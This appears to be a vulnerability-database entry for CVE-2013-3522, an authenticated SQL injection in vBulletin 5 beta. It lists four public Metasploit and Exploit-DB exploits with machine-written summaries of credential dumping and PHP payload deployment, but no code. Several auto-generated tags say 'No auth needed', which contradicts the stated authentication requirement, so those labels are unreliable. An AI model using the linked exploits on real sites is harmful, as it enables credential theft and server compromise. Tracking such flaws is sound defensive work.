CVE-2013-3522

EXPLOITED

vBulletin 5.0.0 Beta 11 and earlier - Authenticated SQL Injection via nodeid Parameter

Title source: llm
STIX 2.1

Exploitation Summary

CVE-2013-3522 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 4 public exploits from researchers including Metasploit, Orestis Kourides, Orestis Kourides, sinn3r, juan vazquez, including a Metasploit module auxiliary/gather/vbulletin_vote_sqli.

AI-analyzed exploit summary This Metasploit module exploits a SQL injection vulnerability in vBulletin 5 to extract user credentials and deploy a PHP payload via admin panel access. It automates the process of brute-forcing node IDs, extracting user data, and installing a malicious product.

Description

SQL injection vulnerability in index.php/ajax/api/reputation/vote in vBulletin 5.0.0 Beta 11, 5.0.0 Beta 28, and earlier allows remote authenticated users to execute arbitrary SQL commands via the nodeid parameter.

Exploits (4)

exploitdb WORKING POC VERIFIED
by Metasploit · rubyremotephp
https://www.exploit-db.com/exploits/30212

This Metasploit module exploits a SQL injection vulnerability in vBulletin 5 to extract user credentials and deploy a PHP payload via admin panel access. It automates the process of brute-forcing node IDs, extracting user data, and installing a malicious product.

Classification
Working Poc 95%
Attack Type
Sqli
Complexity
Moderate
Reliability
Reliable
Target: vBulletin 5.0.0 Beta 11-28
No auth needed
Prerequisites: Access to the target vBulletin instance · Valid node ID or range for brute-forcing
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WORKING POC VERIFIED
by Orestis Kourides · perlwebappsphp
https://www.exploit-db.com/exploits/24882

This exploit targets a SQL injection vulnerability in vBulletin 5 Beta versions 11-28. It authenticates with provided credentials and then sends a maliciously crafted POST request to trigger a blind SQLi, extracting the database version.

Classification
Working Poc 95%
Attack Type
Sqli
Complexity
Moderate
Reliability
Reliable
Target: vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28
Auth required
Prerequisites: Valid vBulletin credentials · Target running vulnerable vBulletin version
devstral-2 · analyzed Feb 16, 2026 Full analysis →
metasploit WORKING POC
by Orestis Kourides, sinn3r, juan vazquez · rubypoc
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/vbulletin_vote_sqli.rb

This Metasploit module exploits a SQL injection vulnerability in vBulletin 5 to extract usernames and password hashes. It uses a brute-force approach to find a valid node ID and then performs SQLi to dump credentials.

Classification
Working Poc 100%
Attack Type
Sqli
Complexity
Moderate
Reliability
Reliable
Target: vBulletin 5
No auth needed
Prerequisites: Access to the vBulletin instance · Valid node ID or range to brute-force
devstral-2 · analyzed Feb 16, 2026 Full analysis →
metasploit WORKING POC EXCELLENT
by Orestis Kourides, juan vazquez · rubypocphp
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb

This Metasploit module exploits a SQL injection vulnerability in vBulletin 5 to extract user credentials and deploy a PHP payload via admin panel access. It uses a time-based blind SQLi technique to extract data and leverages stolen credentials for authentication.

Classification
Working Poc 95%
Attack Type
Sqli
Complexity
Moderate
Reliability
Reliable
Target: vBulletin 5.0.0 Beta 11-28
No auth needed
Prerequisites: Access to the target vBulletin instance · Valid node ID or range for brute-forcing
devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (2)

Core 2
Core References
Exploit exploit x_refsource_exploit-db
http://www.exploit-db.com/exploits/24882
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/92031

Scores

EPSS 0.5635
EPSS Percentile 98.2%

Details

VulnCheck KEV 2013-12-11
CWE
CWE-89
Status published
Products (1)
vbulletin/vbulletin 5.0.0 beta_11 (2 CPE variants)
Published May 10, 2013
Tracked Since Feb 18, 2026